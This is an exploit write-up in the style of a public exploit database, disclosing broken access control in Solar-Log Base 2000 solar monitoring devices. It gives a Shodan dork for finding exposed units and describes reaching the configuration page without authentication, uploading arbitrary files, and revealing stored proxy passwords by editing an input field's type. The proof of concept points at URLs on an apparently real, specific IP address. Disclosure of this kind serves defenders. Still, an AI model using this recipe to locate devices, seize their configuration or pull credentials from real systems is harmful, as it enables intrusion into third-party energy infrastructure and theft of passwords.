# Exploit Title: Solar-Log Base 2000- Broken Access Control
# Google Dork: In Shodan search engine, the filter is ""Server: IPC@CHIP"" "http.favicon.hash:-1334408578 "655744600""
# Date: 4/21/2024
# Exploit Author: parsa rezaie khiabanloo
# Vendor Homepage: https://www.solar-log.com/en/
# Version: Solar-Log Base 2000
# Tested on: Windows/Linux
# 1. Description:
# An issue was discovered in Solar-Log Base 2000.
# Attacker can use shodan dorks to find the devices then can go to the configuration tab without aunthentication .
# In this Configuration tab can upload anyfile that want .
# Attacker can set this path #ilang=EN&b=c_network_proxy to find proxies with password for grap password as clear that can use Inspect element then click on the password .
# Change this input type value to clear
<input type="password" id="i_prxpass" name="434" class="field SDSLF1">
<input type="clear" id="i_prxpass" name="434" class="field SDSLF1">
# 2. Proof of Concept (POC) :
http://46.44.227.172:84/#ilang=EN&b=c_network_proxy
http://46.44.227.172:84/#ilang=EN&b=c_data_initial